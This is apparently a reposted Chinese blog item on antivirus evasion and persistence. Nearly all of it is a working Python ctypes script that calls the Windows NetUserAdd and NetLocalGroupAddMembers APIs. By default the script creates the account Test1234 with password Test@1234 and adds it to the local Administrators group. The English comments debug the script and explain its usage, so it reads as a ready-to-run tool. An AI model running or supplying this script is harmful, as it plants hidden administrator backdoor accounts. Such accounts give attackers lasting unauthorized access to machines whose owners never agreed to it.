免杀/权限维持------API添加用户

原文      

https://mp.weixin.qq.com/s/5Iitrfst3TXd8sRCfq6sHw

Python 2 脚本（print 写法在 Python 3 下同样可用），默认添加用户 Test1234，密码 Test@1234，并加入 Administrators 组。需要以管理员权限运行（NetUserAdd / NetLocalGroupAddMembers 否则返回 ERROR_ACCESS_DENIED），且密码必须满足本机密码策略，否则 NetUserAdd 直接返回错误码。

import ctypes
from ctypes import wintypes
from ctypes import *
import sys

# Constants from lmaccess.h used with USER_INFO_1.
# usri1_priv: NetUserAdd only accepts USER_PRIV_USER for new accounts.
USER_PRIV_GUEST = 0x0
USER_PRIV_USER = 0x1
USER_PRIV_ADMIN = 0x2
# usri1_flags bits; UF_SCRIPT must always be set for USER_INFO_1.
UF_SCRIPT = 0x0001
UF_NORMAL_ACCOUNT = 0x0200

# Byte-pointer type used for the opaque "buf" parameters of the Net* APIs.
LPBYTE = ctypes.POINTER(ctypes.c_byte)

class USER_INFO_1(ctypes.Structure):
    """ctypes mirror of the Win32 USER_INFO_1 structure (lmaccess.h).

    Field order and types must match the native layout exactly, because
    the instance is handed to NetUserAdd at information level 1.
    All LPWSTR fields are c_wchar_p: assign a Python string or None.
    """
    _fields_ = [
        ('usri1_name',wintypes.LPWSTR),          # account name to create
        ('usri1_password',wintypes.LPWSTR),      # initial password (subject to local policy)
        ('usri1_password_age',wintypes.DWORD),   # ignored by NetUserAdd
        ('usri1_priv',wintypes.DWORD),           # must be USER_PRIV_USER for NetUserAdd
        ('usri1_home_dir',wintypes.LPWSTR),      # None = no home directory
        ('usri1_comment',wintypes.LPWSTR),       # None = no comment
        ('usri1_flags',wintypes.DWORD),          # UF_* bits; UF_SCRIPT is mandatory
        ('usri1_script_path',wintypes.LPWSTR)    # None = no logon script
    ]

class _LOCALGROUP_MEMBERS_INFO_3(ctypes.Structure):
    """ctypes mirror of the Win32 LOCALGROUP_MEMBERS_INFO_3 structure.

    Used with NetLocalGroupAddMembers at level 3, where a member is
    identified by name ("DOMAIN\\user" or a bare local account name).
    """
    _fields_ = [
        ('lgrmi3_domainandname', wintypes.LPWSTR)   # c_wchar_p; assign a Python string
    ]

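def adduser(username='Test1234', password='Test@1234'):
    """Create a local Windows account with NetUserAdd (information level 1).

    Args:
        username: name of the account to create.
        password: initial password. It must satisfy the machine's password
            policy (length/complexity), otherwise NetUserAdd rejects it.

    Returns:
        The NET_API_STATUS returned by NetUserAdd (0 on success). The status
        and, on failure, the index of the offending USER_INFO_1 field are
        also printed. Common failures: 5 ERROR_ACCESS_DENIED (not elevated),
        2224 NERR_UserExists, 2245 NERR_PasswordTooShort (policy).

    Requires an elevated token; the clear-text password is echoed to stdout
    on success, so be aware of where that output ends up.
    """
    ui = USER_INFO_1()
    ui.usri1_name = username
    ui.usri1_password = password
    ui.usri1_priv = USER_PRIV_USER      # NetUserAdd accepts only USER_PRIV_USER here
    ui.usri1_home_dir = None
    ui.usri1_comment = None
    ui.usri1_flags = UF_SCRIPT          # UF_SCRIPT is mandatory for USER_INFO_1
    ui.usri1_script_path = None

    net_user_add = ctypes.windll.Netapi32.NetUserAdd
    # Declare the prototype so ctypes passes a *pointer* to the struct.
    # The original passed `ui` with no argtypes, i.e. the structure by value;
    # that appears to work on 64-bit Python only because the x64 ABI passes
    # large structs through a hidden pointer, and would scramble the
    # argument layout on 32-bit Python.
    net_user_add.argtypes = (
        wintypes.LPCWSTR,               # servername (None = local machine)
        wintypes.DWORD,                 # level
        ctypes.c_void_p,                # buf -> USER_INFO_1
        ctypes.POINTER(wintypes.DWORD), # parm_err (index of invalid field)
    )
    net_user_add.restype = wintypes.DWORD   # NET_API_STATUS
    parm_err = wintypes.DWORD(0)

    status = net_user_add(None, 1, ctypes.byref(ui), ctypes.byref(parm_err))
    if status == 0:
        print("add user success : name={} passwd={}".format(username, password))
    else:
        # Surface the status so a policy or privilege failure is diagnosable.
        print("add user error : status={} parm_err={}".format(status, parm_err.value))
    return status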

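def addgroup(username='Test1234', groupname='Administrators'):
    """Add a local account to a local group with NetLocalGroupAddMembers (level 3).

    Args:
        username: member name ("user" or "DOMAIN\\user").
        groupname: local group to join. NOTE: 'Administrators' is the
            English name; localized Windows installs use a translated name
            (the group's well-known SID S-1-5-32-544 is what stays stable).

    Returns:
        The NET_API_STATUS returned by NetLocalGroupAddMembers (0 on
        success); it is also printed. Common failures: 5 ERROR_ACCESS_DENIED
        (not elevated), 1378 ERROR_MEMBER_IN_ALIAS (already a member),
        1387 ERROR_NO_SUCH_MEMBER (user does not exist).
    """
    member = _LOCALGROUP_MEMBERS_INFO_3()
    member.lgrmi3_domainandname = username

    add_members = ctypes.windll.Netapi32.NetLocalGroupAddMembers
    add_members.argtypes = (
        wintypes.LPCWSTR,   # servername (None = local machine)
        wintypes.LPCWSTR,   # groupname
        wintypes.DWORD,     # level
        LPBYTE,             # buf -> array of LOCALGROUP_MEMBERS_INFO_3
        wintypes.DWORD,     # totalentries
    )
    add_members.restype = wintypes.DWORD    # NET_API_STATUS

    # The original built the buffer as LPBYTE(member). POINTER(c_byte)(obj)
    # only accepts a c_byte instance and raises TypeError for a Structure,
    # so the API call was never reached. Take a real pointer and cast it.
    buf = ctypes.cast(ctypes.pointer(member), LPBYTE)

    status = add_members(None, groupname, 3, buf, 1)
    if status == 0:
        print("add group success : name={} group={}".format(username, groupname))
    else:
        # Surface the status so a privilege or lookup failure is diagnosable.
        print("add group error : status={}".format(status))
    return status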

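def main():
    """Command-line entry point.

    Usage:
        script                              create Test1234 / Test@1234, add to Administrators
        script USERNAME PASSWORD            create the account, add to Administrators
        script USERNAME PASSWORD GROUPNAME  create the account, add to GROUPNAME

    Any other argument count prints the usage text. The group step runs even
    when account creation fails (e.g. the account already exists), matching
    the original behaviour.
    """
    args = sys.argv[1:]
    if not args:
        adduser()
        addgroup()
    elif len(args) == 2:
        adduser(args[0], args[1])
        addgroup(args[0])
    elif len(args) == 3:
        adduser(args[0], args[1])
        addgroup(args[0], args[2])
    else:
        # Bug fix: the original formatted sys.argv[1] (the first user
        # argument) into the usage text instead of the program name.
        prog = sys.argv[0]
        print("usage: {} username password".format(prog))
        print("usage: {} username password groupname".format(prog))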

# Run the CLI only when executed directly, not when imported as a module.
if __name__ == "__main__":
    main()

 
